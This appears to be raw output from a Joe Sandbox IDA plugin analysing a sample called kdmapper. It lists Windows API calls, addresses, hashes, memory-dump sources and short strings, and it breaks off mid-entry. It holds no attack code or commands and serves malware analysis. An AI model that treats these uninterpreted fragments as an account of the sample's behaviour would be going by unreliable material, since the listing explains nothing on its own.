                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                          • Instruction ID: edd4d095af8a5b7c8e499acd1dd0d0f7b6ee95aa078947361dc955b958ef084d
                                                                                                                                                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C113D71A92B08AEE7A0B7B1CC07FCB7BAE9F00B10F400C1DB29D67293DA65A5058754
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0063E669,0063E5CC,0063E86D), ref: 0063E605
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0063E61B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0063E630
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                          • API String ID: 667068680-1718035505
                                                                                                                                                                          • Opcode ID: 1bdc3ee7948a551f53125315ab014c3b7195f26c0f507400c4253351ea295f16
                                                                                                                                                                          • Instruction ID: 2e2aef5e0472d99b204df1daf4fd0f37709ee0ccc7eb86514092f3b1e0730626
                                                                                                                                                                          • Opcode Fuzzy Hash: 1bdc3ee7948a551f53125315ab014c3b7195f26c0f507400c4253351ea295f16
                                                                                                                                                                          • Instruction Fuzzy Hash: 6EF0C2317803225B0F218EA55C9A5A662CF6A27792F011539E902D73D0EB16CD565BF0
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 0064891E
                                                                                                                                                                            • Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
                                                                                                                                                                            • Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00648930
                                                                                                                                                                          • _free.LIBCMT ref: 00648943
                                                                                                                                                                          • _free.LIBCMT ref: 00648954
                                                                                                                                                                          • _free.LIBCMT ref: 00648965
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID: pe
                                                                                                                                                                          • API String ID: 776569668-324909747
                                                                                                                                                                          • Opcode ID: 800eea9d03a9f402c21193e61212c803aea8ccebddd17efe16ca5c1ddedbcaa4
                                                                                                                                                                          • Instruction ID: 3ec288e30488ec9fd377ceb0da3237d66ca7d49fa670fd30d9df22ab0779e9c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 800eea9d03a9f402c21193e61212c803aea8ccebddd17efe16ca5c1ddedbcaa4
                                                                                                                                                                          • Instruction Fuzzy Hash: 37F0DA71811623AF8B8AAF18FC2245D3FA3FB24725711270AF514973B2DB364A819B85
                                                                                                                                                                          APIs
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 006314C2
                                                                                                                                                                            • Part of subcall function 0062B146: GetVersionExW.KERNEL32(?), ref: 0062B16B
                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006314E6
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00631500
                                                                                                                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00631513
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00631523
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00631533
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2092733347-0
                                                                                                                                                                          • Opcode ID: 42e0162fa746823e6cee318133d7bb0d11cc7ef16ab681f5d299a8a86312047e
                                                                                                                                                                          • Instruction ID: 58379a11010d772a94b631d0c97ec0098dd4ddab60b2bc374d0b294c351753db
                                                                                                                                                                          • Opcode Fuzzy Hash: 42e0162fa746823e6cee318133d7bb0d11cc7ef16ab681f5d299a8a86312047e
                                                                                                                                                                          • Instruction Fuzzy Hash: F231F675108316ABC700DFA8C88499BBBF9BF98754F005A1EF999C3210E730D619CBA6
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00642AF1,006402FC,0063FA34), ref: 00642B08
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00642B16
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00642B2F
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00642AF1,006402FC,0063FA34), ref: 00642B81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: 194949cc0bb3042157563dfa6dac82bb0895f131ee354d761e4a1244a27fd35e
                                                                                                                                                                          • Instruction ID: b9c7179f814ef812f341b5e618d6c35c26d8f75d0c095d9be40e5f8a1b26c28b
                                                                                                                                                                          • Opcode Fuzzy Hash: 194949cc0bb3042157563dfa6dac82bb0895f131ee354d761e4a1244a27fd35e
                                                                                                                                                                          • Instruction Fuzzy Hash: 7201D4365097236EAB582E747C959AA2F5BEF46BBABF0173EF110552E0EF124D009148
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00661030,00644674,00661030,?,?,00643F73,00000050,?,00661030,00000200), ref: 006497E9
                                                                                                                                                                          • _free.LIBCMT ref: 0064981C
                                                                                                                                                                          • _free.LIBCMT ref: 00649844
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00661030,00000200), ref: 00649851
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00661030,00000200), ref: 0064985D
                                                                                                                                                                          • _abort.LIBCMT ref: 00649863
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                          • Opcode ID: 65b16ac38b7109bc04364212d37dd7982d4cb214f31f29d9de8c7fd1cfcdaa38
                                                                                                                                                                          • Instruction ID: 36722333a7a4fda6d44ebc30a089d4c06646d8728d6c2cdbd226463c6d3350b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 65b16ac38b7109bc04364212d37dd7982d4cb214f31f29d9de8c7fd1cfcdaa38
                                                                                                                                                                          • Instruction Fuzzy Hash: 93F028351C07116EC7927778BC0AA9F2A678FE2B72F21052CF525933D2FE21C9028539
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0063DC47
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063DC61
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063DC72
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0063DC7C
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0063DC86
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0063DC91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2148572870-0
                                                                                                                                                                          • Opcode ID: ad5d32fdd15bd65b2d5c12c95e1632ce7ad912a976423bba2498d24bc07f6b9f
                                                                                                                                                                          • Instruction ID: b564a0979c1342b2f2535e9782010dbdc3fe50a2e77a2c08db2d034b0456a405
                                                                                                                                                                          • Opcode Fuzzy Hash: ad5d32fdd15bd65b2d5c12c95e1632ce7ad912a976423bba2498d24bc07f6b9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF03C72A01229BBCB20ABA5EC4CDCB7F6EEF42B91F005111B50AD2250D6748646C7A0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0063A699: GetDC.USER32(00000000), ref: 0063A69D
                                                                                                                                                                            • Part of subcall function 0063A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0063A6A8
                                                                                                                                                                            • Part of subcall function 0063A699: ReleaseDC.USER32(00000000,00000000), ref: 0063A6B3
                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 0063A83C
                                                                                                                                                                            • Part of subcall function 0063AAC9: GetDC.USER32(00000000), ref: 0063AAD2
                                                                                                                                                                            • Part of subcall function 0063AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0063AB01
                                                                                                                                                                            • Part of subcall function 0063AAC9: ReleaseDC.USER32(00000000,?), ref: 0063AB99
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                          • String ID: "c$($Ac
                                                                                                                                                                          • API String ID: 1061551593-2311861970
                                                                                                                                                                          • Opcode ID: 7aaf4b8d9169ac3bdbac96e77a71f6d1576b8b6692287758515cbaf607e2610e
                                                                                                                                                                          • Instruction ID: aa2060c2fd2d7d8057d18a028c74e6054d2f3ec146ab9e6d1733813e0e0d908e
                                                                                                                                                                          • Opcode Fuzzy Hash: 7aaf4b8d9169ac3bdbac96e77a71f6d1576b8b6692287758515cbaf607e2610e
                                                                                                                                                                          • Instruction Fuzzy Hash: BC910471604754AFD710DF65C844A2BBBEAFFC9B01F00491EF59AD3260DB30A905DBA2
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 006305DA: _wcslen.LIBCMT ref: 006305E0
                                                                                                                                                                            • Part of subcall function 0062B92D: _wcsrchr.LIBVCRUNTIME ref: 0062B944
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0062C197
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0062C1DF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$_wcsrchr
                                                                                                                                                                          • String ID: .exe$.rar$.sfx
                                                                                                                                                                          • API String ID: 3513545583-31770016
                                                                                                                                                                          • Opcode ID: a4afaf619ff0ec4d27f340c14a4a69d31c551a1801c0f08b48480eba032bd81b
                                                                                                                                                                          • Instruction ID: e80af60e1eb48f362e0ab36c97691f8177c2a458d9538ffd29411b751f86fabd
                                                                                                                                                                          • Opcode Fuzzy Hash: a4afaf619ff0ec4d27f340c14a4a69d31c551a1801c0f08b48480eba032bd81b
                                                                                                                                                                          • Instruction Fuzzy Hash: 01415B21500B71D9D731AF34A816ABE73A7EF41B64F10450EFCC16B281EB514E95CB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0062BB27
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0062A275,?,?,00000800,?,0062A23A,?,0062755C), ref: 0062BBC5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0062BC3B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                          • String ID: UNC$\\?\
                                                                                                                                                                          • API String ID: 3341907918-253988292
                                                                                                                                                                          • Opcode ID: 4798a0db7cb6d37431b010d17d678d9cc823770010c5c0146beddb30560d2fe4
                                                                                                                                                                          • Instruction ID: 81f7af86ee5a2a5ae5cfec3ebf3bdcf9c67e98f7a799b926e34ceee0a983bb1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4798a0db7cb6d37431b010d17d678d9cc823770010c5c0146beddb30560d2fe4
                                                                                                                                                                          • Instruction Fuzzy Hash: 3541D631500A35A6DF61AF20EC02EEE776BEF41391F049429F854A3251EB70EE94CFA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 0063CD84
                                                                                                                                                                            • Part of subcall function 0063AF98: _wcschr.LIBVCRUNTIME ref: 0063B033
                                                                                                                                                                            • Part of subcall function 00631FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0062C116,00000000,.exe,?,?,00000800,?,?,?,00638E3C), ref: 00631FD1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcschr$CompareString
                                                                                                                                                                          • String ID: <$HIDE$MAX$MIN
                                                                                                                                                                          • API String ID: 69343711-3358265660
                                                                                                                                                                          • Opcode ID: 43d3d4547a4ad8cc3a6436e7dfeb831936efd5a6d68b2d0e1b48dacda2a0e513
                                                                                                                                                                          • Instruction ID: 07448d2efd849b7eb40870ca596df27fa712534fabc766773685fe85ca598e5e
                                                                                                                                                                          • Opcode Fuzzy Hash: 43d3d4547a4ad8cc3a6436e7dfeb831936efd5a6d68b2d0e1b48dacda2a0e513
                                                                                                                                                                          • Instruction Fuzzy Hash: E03143729002199ADF25DB54DC45EEE73BEEB15360F40856AF905E7180EBB09E848FE1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0063AAD2
                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 0063AB01
                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0063AB99
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectRelease
                                                                                                                                                                          • String ID: -c$7c
                                                                                                                                                                          • API String ID: 1429681911-3403977824
                                                                                                                                                                          • Opcode ID: fd39ea1505ee81b5955e1660273aed7eab9733723b26653aa210ecd37d8d4301
                                                                                                                                                                          • Instruction ID: 9179fc34e11ba75b678d318f3e67187ccb285a15110e98a1dc43a2e68f010bb2
                                                                                                                                                                          • Opcode Fuzzy Hash: fd39ea1505ee81b5955e1660273aed7eab9733723b26653aa210ecd37d8d4301
                                                                                                                                                                          • Instruction Fuzzy Hash: D7212A72108314FFD3019FA5DC48E6FBFEAFB89B51F041919FA4692220D7319A549B62
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0062B9B8
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 0062B9D6
                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 0062B9E6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                                                          • String ID: %c:\
                                                                                                                                                                          • API String ID: 525462905-3142399695
                                                                                                                                                                          • Opcode ID: 4c0a14bf84f86c279bb05e0f6ad057d85917fb3a1338da76377e79077343ea7f
                                                                                                                                                                          • Instruction ID: 9143499bd74fd4f098933ca6d06f67e6aca3297bbedf040da62c9a5b791de267
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c0a14bf84f86c279bb05e0f6ad057d85917fb3a1338da76377e79077343ea7f
                                                                                                                                                                          • Instruction Fuzzy Hash: F1014963500B32659B706B35AC45D6BB79EEE86B70B54540EF544D6182FB20E44086B1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
                                                                                                                                                                            • Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0063B2BE
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0063B2D6
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 0063B304
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
